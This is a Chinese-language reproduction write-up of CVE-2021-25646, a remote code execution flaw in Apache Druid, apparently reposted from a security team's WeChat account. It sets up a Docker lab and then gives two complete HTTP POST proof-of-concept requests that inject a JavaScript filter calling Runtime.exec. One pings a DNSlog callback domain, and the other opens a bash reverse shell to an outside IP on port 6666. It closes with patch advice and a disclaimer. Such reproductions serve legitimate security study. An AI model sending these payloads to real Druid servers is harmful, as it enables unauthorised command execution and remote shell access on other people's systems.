0x01 简介
0x02 环境搭建
直接docker拉取环境
docker pull fokkodriesprong/docker-druid #拉取镜像
docker run --rm -i -p 8888:8888 fokkodriesprong/docker-druid #启动镜像
环境搭建成功访问是这个酱紫
http://192.168.46.131:8888
脚本检测(萌新写的太烂就不放出来了)
0x03 漏洞复现
这里利用DNSlog检测是否可以执行命令,附上PoC:
POST /druid/indexer/v1/sampler?for=filter HTTP/1.1
Host: 192.168.46.131:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 556
Origin: http://192.168.46.131:8888
Connection: close
Referer: http://192.168.46.131:8888/unified-console.html
{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"/opt/","filter":""}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript",
"function":"function(value){return java.lang.Runtime.getRuntime().exec('ping ylqm00.dnslog.cn')}",
"dimension":"added",
"":{
"enabled":"true"
}
}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}
反弹shell(直接将ping命令换成反弹shell的命令就可以)
POST /druid/indexer/v1/sampler?for=filter HTTP/1.1
Host: 192.168.46.131:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 606
Origin: http://192.168.46.131:8888
Connection: close
Referer: http://192.168.46.131:8888/unified-console.html
{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"/opt/","filter":""}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript",
"function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/138.128.214.57/6666 0>&1')}",
"dimension":"added",
"":{
"enabled":"true"
}
}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}
直接上图
填写目录
quickstart/tutorial/
wikiticker-2015-09-12-sampled.json.gz
开启代理抓包修改数据
反弹shell成功
0x04 安全建议
建议广大用户及时更新Apache Druid,下载链接为:
https://druid.apache.org/downloads.html
https://github.com/apache/druid/releases/tag/druid-0.20.1
本文始发于微信公众号(Khan安全团队):【CVE-2021-25646 | 附PoC】Apache Druid 远程代码执行漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论